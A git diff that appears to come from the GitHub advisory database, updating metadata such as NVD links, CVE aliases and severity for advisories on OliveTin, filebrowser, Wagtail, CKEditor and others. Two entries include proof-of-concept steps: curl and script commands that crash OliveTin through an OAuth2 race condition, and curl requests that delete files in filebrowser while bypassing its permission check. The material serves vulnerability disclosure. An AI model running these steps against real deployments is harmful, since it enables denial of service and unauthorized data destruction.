Publish Advisories

GHSA-43gx-6gv6-3jcp
GHSA-45m3-398w-m2m9
GHSA-4fqm-6fmh-82mq
GHSA-79pf-vx4x-7jmm
GHSA-hw26-mmpg-fqfg
GHSA-jrqm-vmqc-gm93
GHSA-mr74-928f-rw69
GHSA-p4v8-rw59-93cq
GHSA-p5cm-246w-84jm
GHSA-pc8g-78pf-4xrp
GHSA-xvp8-3mhv-424c

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-43gx-6gv6-3jcp/GHSA-43gx-6gv6-3jcp.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-43gx-6gv6-3jcp",
-  "modified": "2026-03-02T20:14:23Z",
+  "modified": "2026-03-05T22:49:44Z",
   "published": "2026-03-02T20:14:23Z",
   "aliases": [
     "CVE-2026-28413"
@@ -81,6 +81,10 @@
       "type": "WEB",
       "url": "https://github.com/plone/Products.isurlinportal/security/advisories/GHSA-43gx-6gv6-3jcp"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28413"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/plone/Products.isurlinportal"
@@ -93,6 +97,6 @@
     "severity": "MODERATE",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-02T20:14:23Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T21:16:22Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-45m3-398w-m2m9/GHSA-45m3-398w-m2m9.json

@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-45m3-398w-m2m9",
-  "modified": "2026-03-02T21:41:36Z",
+  "modified": "2026-03-05T22:49:34Z",
   "published": "2026-03-02T21:41:36Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2026-28789"
+  ],
   "summary": "OliveTin has unauthenticated DoS via concurrent map writes in OAuth2 state handling",
   "details": "### Summary\nAn unauthenticated denial-of-service vulnerability exists in OliveTin’s OAuth2 login flow. Concurrent requests to /oauth/login can trigger unsynchronized access to a shared registeredStates map, causing a Go runtime panic (fatal\n  error: concurrent map writes) and process termination. This allows remote attackers to crash the service when OAuth2 is enabled.\n\n\n### Details\nThe OAuth2 handler stores per-login state in a shared map without synchronization:\n\n  - service/internal/auth/otoauth2/restapi_auth_oauth2.go:24\n    registeredStates map[string]*oauth2State\n  - Unlocked write in login handler: .../restapi_auth_oauth2.go:141\n  - Unlocked read in callback check: .../restapi_auth_oauth2.go:174\n  - Unlocked writes in callback flow: .../restapi_auth_oauth2.go:284-285\n  - Unlocked read in auth chain check: .../restapi_auth_oauth2.go:376\n\n  These paths are network reachable via publicly registered routes:\n```bash\n  - service/internal/httpservers/frontend.go:71 → /oauth/login\n  - service/internal/httpservers/frontend.go:72 → /oauth/callback\n```\n  Because Go HTTP handlers run concurrently, high parallel traffic to /oauth/login causes concurrent map access and runtime panic.\n\n  Tested on:\n\n  - Container image: ghcr.io/olivetin/olivetin:3000.10.0\n  - Source also contains same pattern at commit/tag eb42029b5d0c0633551621288180dd4566b913f7 (3000.10.1)\n\n\n### PoC\n1. Start OliveTin with OAuth2 provider configured (example github), exposing port 1337.\n  2. Confirm baseline:\n```bash\n  curl -i http://127.0.0.1:1337/readyz\n  curl -i \"http://127.0.0.1:1337/oauth/login?provider=github\"\n```\n  Expected: 200 for /readyz, 302 for /oauth/login.\n\n  3. Run concurrency PoC:\n```bash\n  python3 /OliveTin/tools/poc_oauth2_state_map_race_dos.py \\\n    --base-url http://127.0.0.1:1337 \\\n    --provider github \\\n    --workers 80 \\\n    --requests 120000 \\\n    --health-failures 3\n```\n  4. Verify crash:\n\n  docker inspect olivetin-dos --format 'status={{.State.Status}} exit={{.State.ExitCode}}'\n  docker logs olivetin-dos 2>&1 | grep -E \"fatal error: concurrent map|concurrent map writes|restapi_auth_oauth2.go\"\n\n  Observed result:\n\n  - Process exited with code 2\n  - Logs include:\n      - fatal error: concurrent map writes\n      - .../internal/auth/otoauth2/restapi_auth_oauth2.go:141 in HandleOAuthLogin\n\n\n\n### Impact\n- Vulnerability type: Race condition (CWE-362) leading to DoS.\n  - Attacker requirements: network access only; no authentication required for exploit path.\n  - Impacted deployments: OliveTin instances with OAuth2 enabled and reachable over network.\n  - Security impact: remote unauthenticated attacker can repeatedly crash OliveTin, causing availability loss until restart/recovery.\n \n[poc_oauth2_state_map_race_dos.py](https://github.com/user-attachments/files/25577901/poc_oauth2_state_map_race_dos.py)",
   "severity": [
@@ -38,6 +40,10 @@
       "type": "WEB",
       "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-45m3-398w-m2m9"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28789"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/OliveTin/OliveTin/commit/f044d90d5525c4c8e3f421b32ed7eff771c22d36"
@@ -56,6 +62,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-02T21:41:36Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T20:16:16Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-4fqm-6fmh-82mq/GHSA-4fqm-6fmh-82mq.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-4fqm-6fmh-82mq",
-  "modified": "2026-03-04T01:57:09Z",
+  "modified": "2026-03-05T22:49:37Z",
   "published": "2026-03-02T21:42:12Z",
   "aliases": [
     "CVE-2026-28790"
@@ -40,13 +40,21 @@
       "type": "WEB",
       "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-4fqm-6fmh-82mq"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28790"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/OliveTin/OliveTin/commit/d9804182eae43cf49f735e6533ddbe1541c2b9a9"
     },
     {
       "type": "PACKAGE",
       "url": "https://github.com/OliveTin/OliveTin"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.0"
     }
   ],
   "database_specific": {
@@ -58,6 +66,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-02T21:42:12Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T20:16:16Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-79pf-vx4x-7jmm/GHSA-79pf-vx4x-7jmm.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-79pf-vx4x-7jmm",
-  "modified": "2026-03-04T22:38:01Z",
+  "modified": "2026-03-05T22:50:21Z",
   "published": "2026-03-04T22:38:01Z",
   "aliases": [
     "CVE-2026-29188"
@@ -10,8 +10,8 @@
   "details": "### Summary\n\nA broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected.\n\n### Details\n\nThe tusDeleteHandler function in http/tus_handlers.go incorrectly gates the DELETE operation behind Perm.Create instead of Perm.Delete:\n\n```go\n// http/tus_handlers.go - tusDeleteHandler (VULNERABLE)\nfunc tusDeleteHandler(cache UploadCache) handleFunc {\n    return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {\n        if r.URL.Path == \"/\" || !d.user.Perm.Create {  // ← Wrong permission checked\n            return http.StatusForbidden, nil\n        }\n        // ...\n        err = d.user.Fs.RemoveAll(r.URL.Path)  // File is deleted\n```\n\nThe correct resourceDeleteHandler in http/resource.go properly checks Perm.Delete:\n\n```go\n// http/resource.go - resourceDeleteHandler (CORRECT)\nfunc resourceDeleteHandler(fileCache FileCache) handleFunc {\n    return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {\n        if r.URL.Path == \"/\" || !d.user.Perm.Delete {  // ← Correct permission\n            return http.StatusForbidden, nil\n        }\n```\n\nThis inconsistency means that DELETE /api/tus/{path} and DELETE /api/resources/{path} enforce entirely different permission models for the same underlying filesystem operation. The TUS endpoint was introduced to support resumable uploads (http/tus_handlers.go) and its DELETE handler is intended to cancel in-progress uploads -however, the RemoveAll call permanently removes the file from the filesystem regardless of how the upload was initiated.\n\n### Proposed fix:\n\n```go\n// http/tus_handlers.go\n- if r.URL.Path == \"/\" || !d.user.Perm.Create {\n+ if r.URL.Path == \"/\" || !d.user.Perm.Delete {\n```\n\n### PoC\n\n- filebrowser built from latest master (git clone https://github.com/filebrowser/filebrowser) \n- Tested on: Kali Linux, go version go1.23+\n\n### Setup section\n\n```bash\n# Build and initialize\ngit clone https://github.com/filebrowser/filebrowser\ncd filebrowser\ngo build -o filebrowser .\n./filebrowser config init\n\n# Create a test user with Create=true but Delete=false\n./filebrowser users add testuser SuperSecurePassword1234 \\\n  --perm.create=true \\\n  --perm.delete=false\n\n# Start server\n./filebrowser &\n```\n\n### POC script steps\n\n1. Confirm the Delete permission is correctly enforced on the standard endpoint:\n\n```bash\nTOKEN=$(curl -s -X POST localhost:8080/api/login \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"testuser\",\"password\":\"SuperSecurePassword1234\"}')\n\n# Attempt deletion via the standard resource endpoint → should be blocked\ncurl -s -X DELETE \"localhost:8080/api/resources/target.txt\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 403\n```\n\n2. Bypass via the TUS Delete endpoint:\n\n```bash\n# Initiate a TUS upload to register the file in the upload cache\ncurl -s -X POST \"localhost:8080/api/tus/target.txt\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Upload-Length: 18\" \\\n  -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 201\n\n# Now delete via the TUS endpoint - Perm.Delete is NOT checked\ncurl -s -X DELETE \"localhost:8080/api/tus/target.txt\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 204  ← File deleted despite Perm.Delete=false\n```\n\n**Observed results:**\n```\nDELETE /api/resources/target.txt  -->  403 Forbidden      ( permission enforced )\nDELETE /api/tus/target.txt            -->   204 No Content    ( permission bypassed )\n```\n\n### Impact\nThis is a broken access control vulnerability (IDOR / permission model bypass). It affects any filebrowser deployment where:\n\n- Multiple users share a single instance, and\n- An administrator has explicitly set Perm.Delete=false for one or more users to restrict destructive operations\n\nAn attacker (authenticated user with Perm.Create=true) can permanently delete any file or directory within their assigned scope-including files they did not create - by initiating a TUS upload against the target path and immediately issuing a TUS DELETE request. This completely undermines the intended access control model, as administrators have no reliable way to prevent file deletion for users who retain upload rights.",
   "severity": [
     {
-      "type": "CVSS_V4",
-      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
     }
   ],
   "affected": [
@@ -43,23 +43,31 @@
       "type": "WEB",
       "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29188"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f"
     },
     {
       "type": "PACKAGE",
       "url": "https://github.com/filebrowser/filebrowser"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1"
     }
   ],
   "database_specific": {
     "cwe_ids": [
       "CWE-284",
       "CWE-732"
     ],
-    "severity": "MODERATE",
+    "severity": "CRITICAL",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-04T22:38:01Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T21:16:23Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-hw26-mmpg-fqfg/GHSA-hw26-mmpg-fqfg.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-hw26-mmpg-fqfg",
-  "modified": "2026-03-02T19:19:15Z",
+  "modified": "2026-03-05T22:49:20Z",
   "published": "2026-03-02T19:19:15Z",
   "aliases": [
     "CVE-2026-28348"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/fedora-python/lxml_html_clean/security/advisories/GHSA-hw26-mmpg-fqfg"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28348"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/fedora-python/lxml_html_clean/commit/2ef732667ddbc74ea59847bcf24b75809aaeed3b"
@@ -59,6 +63,6 @@
     "severity": "MODERATE",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-02T19:19:15Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T20:16:16Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-jrqm-vmqc-gm93/GHSA-jrqm-vmqc-gm93.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-jrqm-vmqc-gm93",
-  "modified": "2026-03-04T18:49:32Z",
+  "modified": "2026-03-05T22:49:17Z",
   "published": "2026-03-04T18:49:32Z",
   "aliases": [
     "CVE-2026-28343"
@@ -59,6 +59,10 @@
       "type": "WEB",
       "url": "https://github.com/ckeditor/ckeditor5/security/advisories/GHSA-jrqm-vmqc-gm93"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28343"
+    },
     {
       "type": "PACKAGE",
       "url": "https://github.com/ckeditor/ckeditor5"
@@ -75,6 +79,6 @@
     "severity": "MODERATE",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-04T18:49:32Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T20:16:16Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-mr74-928f-rw69/GHSA-mr74-928f-rw69.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-mr74-928f-rw69",
-  "modified": "2026-03-02T21:59:27Z",
+  "modified": "2026-03-05T22:49:48Z",
   "published": "2026-03-02T20:15:46Z",
   "aliases": [
     "CVE-2026-28492"
@@ -43,6 +43,10 @@
       "type": "WEB",
       "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-mr74-928f-rw69"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28492"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/filebrowser/filebrowser/commit/31194fb57a5b92e7155219d7ec7273028fcb2e83"
@@ -63,6 +67,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-02T20:15:46Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T21:16:22Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-p4v8-rw59-93cq/GHSA-p4v8-rw59-93cq.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-p4v8-rw59-93cq",
-  "modified": "2026-03-03T17:59:31Z",
+  "modified": "2026-03-05T22:49:05Z",
   "published": "2026-03-03T17:59:30Z",
   "aliases": [
     "CVE-2026-28223"
@@ -97,6 +97,10 @@
       "type": "WEB",
       "url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-p4v8-rw59-93cq"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28223"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/wagtail/wagtail/commit/1c6f2effed68f4ccad6fbd07987e03641505f863"
@@ -141,6 +145,6 @@
     "severity": "MODERATE",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-03T17:59:30Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T20:16:15Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-p5cm-246w-84jm/GHSA-p5cm-246w-84jm.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-p5cm-246w-84jm",
-  "modified": "2026-03-03T17:57:19Z",
+  "modified": "2026-03-05T22:49:01Z",
   "published": "2026-03-03T17:57:18Z",
   "aliases": [
     "CVE-2026-28222"
@@ -97,6 +97,10 @@
       "type": "WEB",
       "url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-p5cm-246w-84jm"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28222"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/wagtail/wagtail/commit/0375094bb57ce6e527005c2bb2e871dd20bca04d"
@@ -141,6 +145,6 @@
     "severity": "MODERATE",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-03T17:57:18Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T20:16:15Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-pc8g-78pf-4xrp/GHSA-pc8g-78pf-4xrp.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-pc8g-78pf-4xrp",
-  "modified": "2026-03-02T18:49:27Z",
+  "modified": "2026-03-05T22:49:13Z",
   "published": "2026-03-02T18:49:27Z",
   "aliases": [
     "CVE-2026-28342"
@@ -40,13 +40,21 @@
       "type": "WEB",
       "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-pc8g-78pf-4xrp"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28342"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/OliveTin/OliveTin/commit/2eb5f0ba79d4bbef3c802bf8b4666a7e18dcfd90"
     },
     {
       "type": "PACKAGE",
       "url": "https://github.com/OliveTin/OliveTin"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.10.2"
     }
   ],
   "database_specific": {
@@ -57,6 +65,6 @@
     "severity": "HIGH",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-02T18:49:27Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-05T20:16:15Z"
   }
 }